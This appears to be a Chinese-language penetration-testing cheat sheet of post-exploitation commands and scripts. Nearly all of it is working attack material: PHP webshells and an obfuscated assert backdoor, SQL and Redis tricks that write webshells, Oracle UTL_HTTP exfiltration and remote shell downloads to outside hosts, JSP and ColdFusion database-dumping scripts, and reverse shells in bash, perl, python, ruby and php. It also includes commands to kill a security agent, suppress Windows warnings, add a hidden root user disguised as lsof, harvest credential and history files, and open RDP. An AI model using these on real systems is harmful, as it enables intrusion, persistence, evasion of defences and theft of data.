PHP相关
1
2
3
4
5
6
7
8
9
10
11
| <?php copy("http://x.x.x.x/shell.txt", "d:\www\shell.php"); ?>
<?php include "$_GET['_']"; ?>
<?php assert($_POST["1"]);?>
<?php
$url = "http://x.x.x.x/shell.txt";
$contents = file_get_contents($url);
echo $contents;
?>
|
Mysql数据库
phpmyadmin爆路径
1
| http://url/phpMyAdmin/libraries/select_lang.lib.php
|
SQL语句导出shell:
1
| select "<?php eval($_POST['1']);?>" into outfile 'C:\www\shell.php';
|
Redis数据库
写shell:
1
2
3
4
| config set dir D:\www
config set dbfilename shell.php
set webshell "<?php eval($_POST[x]);?>"
save
|
Oracle数据库
查数据库ip
1
| select sys_context('userenv','ip_address') from dual
|
通过外连回传数据
1
| SELECT UTL_HTTP.request('http://target.com/getdata?data='||TABLE_NAME) FROM USER_TABLES WHERE ROWNUM<=1
|
查询所有表
1
| SELECT * FROM ALL_TABLES
|
查询当前用户表
1
| select table_name from user_tables;
|
查询所有表按大小排序
1
2
| SELECT TABLE_NAME,NUM_ROWS FROM ALL_TABLES order by NUM_ROWS desc
select table_name,NUM_ROWS from user_tables order by NUM_ROWS desc
|
查询表前十条
1
| select * from users where rownum < 10
|
分页查询 2000000 到 4000000
1
| SELECT * FROM (SELECT e.*,ROWNUM rn FROM (select * from user ) e WHERE ROWNUM <= 4000000) WHERE rn > 2000000
|
查询当前编码
1
| select userenv('language') from dual;
|
命令行执行
1
| export NLS_LANG="american_america.AL32UTF8"
|
拖库脚本
JSP1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| <%@ page contentType="text/html;charset=UTF-8"%>
<%@ page import="java.io.*,java.lang.*,java.sql.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@172.0.0.1:1521:orabi", "admin", "admin");
File f = new File("/webapps/ROOT/css/t1.txt");
BufferedWriter bw = new BufferedWriter(new FileWriter(f));
Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
ResultSet rs=stmt.executeQuery("select * from member where rownum > 2000000");
ResultSetMetaData rsmd = rs.getMetaData();
int numberOfColumns = rsmd.getColumnCount();
for(int i=1;i<numberOfColumns+1;i++){
bw.write(rsmd.getColumnName(i)+",");
}
while (rs.next()){
for(int i=1;i<numberOfColumns+1;i++){
bw.write(rs.getString(i)+",");
}
bw.newLine();
bw.flush();
}
out.print(rs);
%>
|
JSP2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| <%@ page contentType="text/html;charset=UTF-8"%>
<%@ page import="java.io.*,java.lang.*,java.sql.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@127.0.0.1:1521", "admin", "password");
Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
String html="";
File file = new File("/tmp/data.txt");
BufferedReader br = new BufferedReader(new FileReader(file));
String line;
while ((line = br.readLine()) != null) {
html=html+"<h3>"+line+":</h3><table border=1><tr>";
ResultSet rs=stmt.executeQuery("select * from "+line+" where rownum < 100");
ResultSetMetaData rsmd = rs.getMetaData();
int numberOfColumns = rsmd.getColumnCount();
for(int i=1;i<numberOfColumns+1;i++){
html=html+"<th>"+rsmd.getColumnName(i)+"</th>";
}
html+="</tr>";
while (rs.next()){
html+="<tr>";
for(int i=1;i<numberOfColumns+1;i++){
html=html+"<td>"+rs.getString(i)+"</td>";
}
html+="</tr>";
}
rs.close();
html+="<tr></table>";
}
File f = new File("/tmp/info.css");
BufferedWriter bw = new BufferedWriter(new FileWriter(f));
bw.write(html);
bw.close();
br.close();
stmt.close();
conn.close();
%>
|
ColdFusion
1
2
3
4
5
6
7
8
9
10
11
12
13
| <CFSET USERNAME="user">
<CFSET PASSWORD="pass">
<CFSET DATABASE="ya_db">
<CFTRY>
<CFQUERY NAME="DATA" DATASOURCE=#DATABASE# USERNAME=#USERNAME# PASSWORD=#PASSWORD#>
SELECT * FROM MEMBER
</CFQUERY>
<CFCATCH Type="Any"></CFCATCH>
</CFTRY>
<CFSAVECONTENT variable="Dump_DATA">
<CFDUMP var="#DATA#" EXPAND="YES" FORMAT="TEXT">
</CFSAVECONTENT>
<cffile action="write" output="#Dump_DATA#" FILE="C:\\RECYCLER\\#USERNAME#_DATA.txt">
|
反弹shell
bash
1
| bash -i >& /dev/tcp/1.1.1.1/1234 0>&1
|
1
| rm -f /tmp/p; mknod /tmp/p p && telnet 1.1.1.1 1234 0/tmp/p
|
ruby
1
| ruby -rsocket -e'f=TCPSocket.open("1.1.1.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
perl
1
2
3
4
| perl -e 'use Socket;$i="1.1.1.1";
$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
python
1
2
3
4
5
6
7
| python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("1.1.1.1",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'
|
php
1
| php -r '$sock=fsockopen("1.1.1.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
Windows取消共享文件夹安全警告
1
2
| @echo off
Reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PolicIEs\Associations /v LowRiskFileTypes /t REG_SZ /d .exe;.reg;.msi;.bat;.cmd;.com;.vbs;.hta;.scr;.pif;.js;.lnk; /f
|
kill安全狗3.x
1
| ntsd -c q -pn SafeDogGuardCenter.exe
|
其他
python Simple HTTP服务:
1
| python -m SimpleHTTPServer
|
Linux相关技巧
压缩目录
1
2
3
| zip -r root.zip /root/*
tar -czvf root.tar.gz /root/
tar -cvf user/tmp/ooouser.tar user/ --exclude=image --exclude= --exclude *.jpg --exclude *.gif --exclude *.zip --exclude *.bmp --exclude *.eps --exclude *.psd
|
添加用户并设置密码
1
| useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof
|
收集所有.sh .pl .py .conf .cnf .ini .*history .pass (/usr/share目录里面的除外) 并打包成zip
1
| find / \! -path “/usr/share/*” -regex “.*\.sh$\|.*\.pl$\|.*\.py$\|.*\.conf$\|.*\.cnf$\|.*\.ini$\|.*\/\..*history$\|.*\/\..*pass.*” -print|zip pack.zip -@
|
array_push 后门
1
| array_map("ass\x65rt",(array)$_REQUEST['array']);
|
开启3389端口
1
| REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
|